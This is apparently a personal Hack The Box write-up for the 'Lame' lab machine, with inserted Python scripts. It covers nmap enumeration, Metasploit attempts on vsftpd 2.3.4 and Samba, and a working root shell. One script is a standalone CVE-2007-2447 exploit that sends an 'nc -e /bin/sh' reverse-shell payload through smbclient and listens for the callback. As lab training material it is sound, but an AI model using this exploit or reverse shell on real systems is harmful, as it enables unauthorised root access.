Hack The Box: Lame Walkthrough


My 2021 New Year resolution was to take a shot at learning some penetration testing techniques.

In cybersecurity OSINT plays a big part – especially in pentesting.

But at the same time it is also significantly different to the OSINT that focuses on persons, companies, emails, websites and the general digital footprint.

In pentesting, OSINT can mean anything from passive reconnaissance of the target infrastructure, searching for CVEs, literature research (in absolutely any meaning of the word), to lurking on discussion forums or even reaching out to experts for advice.

That is why I recently signed up to Hack the Box – to do all that; and through it, to learn a ton of new stuff.

So here is my first training machine I managed to hack into.

The name very aptly describes my current pentesting skills – but from here I can only get better.

LAME Walkthrough


This walkthrough was conducted from a Parrot OS (Linux) virtual machine connected to the Hack The Box VPN.

Nmap scan

I began with an nmap scan of the machine’s IP address (which is not static, it changes with every instance):

sudo nmap -T4 -A -v -p- 10.129.71.202

  -T4 - the timing template, ranging from 0 (slow & stealthy) to 5 (fast & obvious); T4 is the usual choice on a lab network

  -A - "aggressive" scan: enables OS detection, service/version detection, the default NSE scripts and traceroute in one switch

  -v - verbose output

  -p- - scan all 65535 TCP ports instead of nmap's default top 1000 (sudo is needed for the raw-socket scans and OS detection)

Scan result summary

The following 5 ports and services were identified:

    21/tcp   open  ftp          vsftpd 2.3.4
    22/tcp   open  ssh          OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
    139/tcp  open  netbios-ssn  Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
    445/tcp  open  netbios-ssn  Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
    3632/tcp open  distccd      distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
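Scraping the human-readable table above is fragile; the practical habit is to save the scan with -oX as well and parse the XML. The following Python script is an added example, not part of the original walkthrough or of nmap: it parses nmap XML output into a list of open ports and builds the "product version" strings that the rest of the walkthrough feeds into Metasploit's search. The XML sample is constructed to mirror the five services found above (plus one closed port to show the filtering); the run_nmap helper is an assumption about the command line and is only invoked when the script is run with a target argument.

```python
import subprocess
import sys
import xml.etree.ElementTree as ET

# Constructed sample mirroring the five services nmap found on Lame.
# A real file comes from: sudo nmap -T4 -A -p- -oX lame.xml <target>
SAMPLE_XML = """<nmaprun scanner="nmap" args="nmap -T4 -A -p- -oX lame.xml 10.129.71.202">
  <host>
    <address addr="10.129.71.202" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="21"><state state="open"/>
        <service name="ftp" product="vsftpd" version="2.3.4"/></port>
      <port protocol="tcp" portid="22"><state state="open"/>
        <service name="ssh" product="OpenSSH" version="4.7p1 Debian 8ubuntu1"/></port>
      <port protocol="tcp" portid="139"><state state="open"/>
        <service name="netbios-ssn" product="Samba smbd" version="3.X - 4.X"/></port>
      <port protocol="tcp" portid="445"><state state="open"/>
        <service name="netbios-ssn" product="Samba smbd" version="3.0.20-Debian"/></port>
      <port protocol="tcp" portid="3632"><state state="open"/>
        <service name="distccd" product="distccd" version="v1"/></port>
      <port protocol="tcp" portid="80"><state state="closed"/>
        <service name="http"/></port>
    </ports>
  </host>
</nmaprun>
"""


def parse_open_ports(xml_text):
    """Return one dict per *open* port: port, proto, service, product, version."""
    root = ET.fromstring(xml_text)
    results = []
    for port in root.iter("port"):
        state = port.find("state")
        if state is None or state.get("state") != "open":
            continue  # closed/filtered ports are noise for service enumeration
        svc = port.find("service")
        results.append({
            "port": int(port.get("portid")),
            "proto": port.get("protocol"),
            "service": svc.get("name", "") if svc is not None else "",
            "product": svc.get("product", "") if svc is not None else "",
            "version": svc.get("version", "") if svc is not None else "",
        })
    return sorted(results, key=lambda r: r["port"])


def search_terms(ports):
    """Build 'product version' strings suitable for `msf6 > search` or
    searchsploit. Entries without a detected product are skipped."""
    terms = []
    for p in ports:
        if p["product"]:
            terms.append(f'{p["product"]} {p["version"]}'.strip())
    return terms


def run_nmap(target, outfile="scan.xml"):
    """Assumed helper: runs the same scan as the walkthrough but also saves
    XML. Requires nmap on PATH and root for -A's OS detection (hence sudo)."""
    subprocess.run(["sudo", "nmap", "-T4", "-A", "-p-", "-oX", outfile, target],
                   check=True)
    with open(outfile, encoding="utf-8") as fh:
        return fh.read()


if __name__ == "__main__":
    xml_text = run_nmap(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_XML
    found = parse_open_ports(xml_text)
    for entry in found:
        print(f'{entry["port"]}/{entry["proto"]:<4} {entry["service"]:<12} '
              f'{entry["product"]} {entry["version"]}')
    print("search terms:", search_terms(found))
```

Run it without arguments to see the constructed sample parsed, or with a target IP to scan and parse for real.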


vsftpd 2.3.4

https://en.wikipedia.org/wiki/Vsftpd

vsftpd (Very Secure FTP Daemon) is the default FTP (File Transfer Protocol) server on a number of Linux distributions; FTP is used for storing and transferring files.

Version 2.3.4 dates from 2011, so it is an old release that you are unlikely to meet on a maintained production host, but old services are exactly what a lab box is built around.

In July 2011 it was discovered that the vsftpd 2.3.4 source archive on the project's download site had been replaced with a trojaned copy. The added code checks the FTP username for the two characters ":)" and, when it sees them, opens a shell listening on TCP port 6200. The vulnerability is in that backdoored build, not in vsftpd's own code, so only installations built from the tampered archive are affected.

Online sources: Scary Beast Security, Exploit DB.

It is also worth noting that the scan reported that anonymous FTP login is allowed (nmap's ftp-anon script, run as part of -A, checks for this).

I started with launching Metasploit Framework in order to find out more about the exploit instead of relying on online sources:

    msfconsole
    
    msf6 > search vsftpd


To make use of this exploit, select it from the list (here there is only one result, numbered 0):

    use 0

Metasploit warns that no payload is configured and then defaults to cmd/unix/interact, which is the right choice for this module: the backdoor hands you a shell directly on port 6200, so no reverse payload is needed.

You can display the available options with show options:

    exploit(unix/ftp/vsftpd_234_backdoor) > show options

I set the host to the machine’s IP address:

    set RHOST 10.129.71.202

Unfortunately, these efforts were met with a message: “Exploit completed, but no session was created”.

I went back to the command line, in order to see if connecting directly to the IP address would work…

    msf6 > exit

    ftp 10.129.71.202

When prompted here I tried a number of generic user names (user, admin, test, 123, etc.).

It took me a while until I tried "anonymous" (yes, the hint is in the initial scan result).

When prompted for password, I just hit ENTER.

ftp

Admittedly, I had no idea what to do next. I found a list of Linux FTP commands here and tried them all one after the other.

Nothing worked.

NOTE: At this point I took a long break and forgot to extend the uptime on the Lame machine.

This reset the machine's IP address, so I relaunched it on a new IP – 10.129.89.92.

OpenSSH 4.7p1

https://en.wikipedia.org/wiki/OpenSSH

OpenSSH is the most widely used implementation of the SSH (Secure Shell) protocol, providing encrypted remote login and file transfer.

Version 4.7p1 has some known vulnerabilities listed here.

Searching Metasploit again revealed some exploits for Windows OS, clearly of no use here.

Samba smbd 3.X – 4.X

https://en.wikipedia.org/wiki/Samba_(software)

Samba is an open-source implementation of the SMB/CIFS protocol that provides file and printer sharing between Linux/Unix hosts and Windows clients.

Metasploit lists 19 modules matching Samba 3. Not all of them apply here, since some target Windows or other Unix platforms rather than a Linux Samba server.

I could have tried the relevant exploits one by one, but the better idea is to start with those ranked the highest (excellent).

6 exploit/linux/samba/is_known_pipename  2017-03-24  excellent  Samba is_known_pipename() Arbitrary Module Load

The above exploit however seems to require valid credentials, which I did not have. So I tried another:

9 exploit/linux/samba/trans2open  2003-04-07  great  Samba trans2open Overflow (Linux x86)

msf6 exploit > use 9
[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
msf6 exploit(linux/samba/trans2open) > set RHOSTS 10.129.89.92
RHOSTS => 10.129.89.92
msf6 exploit(linux/samba/trans2open) > run

[*] Started reverse TCP handler on 10.0.2.15:4444 
[*] 10.129.89.92:139 - Trying return address 0xbffffdfc...
[-] 10.129.89.92:139 - Exploit aborted due to failure: no-target: This target is not a vulnerable Samba server (Samba 3.0.20-Debian)
[*] Exploit completed, but no session was created.

I unsuccessfully tried a number of times, including the next exploit on the list:

11  exploit/multi/samba/usermap_script  2007-05-14   excellent   Samba "username map script" Command Execution

msf6 > use 11
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(multi/samba/usermap_script) > set RHOSTS 10.129.89.92
RHOSTS => 10.129.89.92
msf6 exploit(multi/samba/usermap_script) > run

[*] Started reverse TCP handler on 10.0.2.15:4444 
[*] Exploit completed, but no session was created.

It took me a while to understand what I was doing wrong here.

msf6 exploit(multi/samba/usermap_script) > options

The key was to understand that both the RHOSTS and LHOST IP addresses must be set correctly:


In my case this was not configured by default.

The target can only connect back over the Hack The Box VPN, so LHOST must be the address of the tun0 interface, not the VM's NAT address (10.0.2.15 in the handler lines above), which the target cannot route to. ifconfig tun0 (or ip addr show tun0) displays that address.

Then simply set LHOST to that IP:

msf6 exploit(multi/samba/usermap_script) > set LHOST 10.10.14.101

Once everything is set, time to put the exploit to a test:

msf6 exploit(multi/samba/usermap_script) > run

[*] Started reverse TCP handler on 10.10.14.101:4444 
[*] Command shell session 1 opened (10.10.14.101:4444 -> 10.129.89.92:56128) at 2021-01-31 15:20:45 -0500
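Metasploit's module is a wrapper around a one-line trick, and it is worth seeing it without the wrapper. The script below is an added example, not part of the walkthrough and not Metasploit's code: it exploits CVE-2007-2447, the "username map script" bug behind exploit/multi/samba/usermap_script, by hand, and, addressing the LHOST lesson above, reads the tun0 address itself instead of trusting a default. The mechanism is that smbd passes the supplied username to a shell through the map script before authentication, so backticks in the username execute with smbd's privileges (root), which is why no privilege escalation step follows. Assumptions, also marked in the code: smbclient is installed locally, the target's nc supports -e, delivering the username through smbclient -U is enough to reach the map script, and the --option for SMB1 (NT1) is needed because current smbclient refuses SMB1 by default. The sample ip output is constructed.

```python
import re
import socket
import subprocess
import sys
import threading

# Constructed sample of `ip -4 -o addr show tun0` output (one line per address).
SAMPLE_IP_OUTPUT = (
    "5: tun0    inet 10.10.14.101/23 scope global tun0\\       "
    "valid_lft forever preferred_lft forever\n"
)


def tun0_address(ip_output):
    """Parse `ip -4 -o addr show tun0` output and return the IPv4 address.
    This is the VPN address LHOST must be set to, not the VM's NAT address
    (10.0.2.15) that Metasploit chose by default in the walkthrough."""
    m = re.search(r"\binet (\d+\.\d+\.\d+\.\d+)/\d+", ip_output)
    return m.group(1) if m else None


def usermap_payload(lhost, lport):
    """CVE-2007-2447: with 'username map script' set, smbd hands the username
    to /bin/sh via the script, so backticks in it run as the smbd user (root).
    '/=' satisfies the map syntax; the rest is the reverse shell.
    Assumed: nc on the target supports -e (true for the classic exploit)."""
    return f"/=`nohup nc -e /bin/sh {lhost} {lport}`"


def wait_for_shell(lport, command="id", timeout=30):
    """Listen once on lport; when the target connects back, run one command
    and return its output (None if nothing connects within timeout)."""
    srv = socket.socket()
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("0.0.0.0", lport))
    srv.listen(1)
    srv.settimeout(timeout)
    try:
        conn, _ = srv.accept()
    except socket.timeout:
        return None
    finally:
        srv.close()
    with conn:
        conn.sendall((command + "\n").encode())
        conn.settimeout(5)
        return conn.recv(4096).decode(errors="replace").strip()


def send_trigger(rhost, payload):
    """Assumed delivery: any SMB session setup carries the username through
    the map script, so an anonymous share listing with -U <payload> suffices.
    subprocess passes the payload as a single argv entry, so the backticks
    reach smbd untouched by our own shell. The --option is assumed necessary
    for a modern smbclient to talk SMB1 to Samba 3.0.20."""
    subprocess.run(["smbclient", "-L", rhost, "-N", "-U", payload,
                    "--option=client min protocol=NT1"],
                   stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, timeout=20)


if __name__ == "__main__":
    rhost, lport = sys.argv[1], 4444
    ip_out = subprocess.run(["ip", "-4", "-o", "addr", "show", "tun0"],
                            capture_output=True, text=True).stdout
    lhost = tun0_address(ip_out)
    if lhost is None:
        sys.exit("tun0 has no IPv4 address: is the HTB VPN up?")
    result = {}
    listener = threading.Thread(target=lambda: result.update(out=wait_for_shell(lport)))
    listener.start()  # listener must be up before the target calls back
    send_trigger(rhost, usermap_payload(lhost, lport))
    listener.join()
    print("shell says:", result.get("out") or "no connection back (check LHOST/tun0 and the port)")
```

The "id" the listener runs is the same check worth doing first in the Metasploit session: it shows the shell is root, so the user and root flags are both readable without further work.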

Listing directories with the dir command showed the presence of home and root directories.

I navigated with the cd, ls / dir commands between home and root, then searched for text files and used the cat command to grab hash values:


Don’t forget to submit both the user and root flags on Hack The Box to claim ownership of Lame!
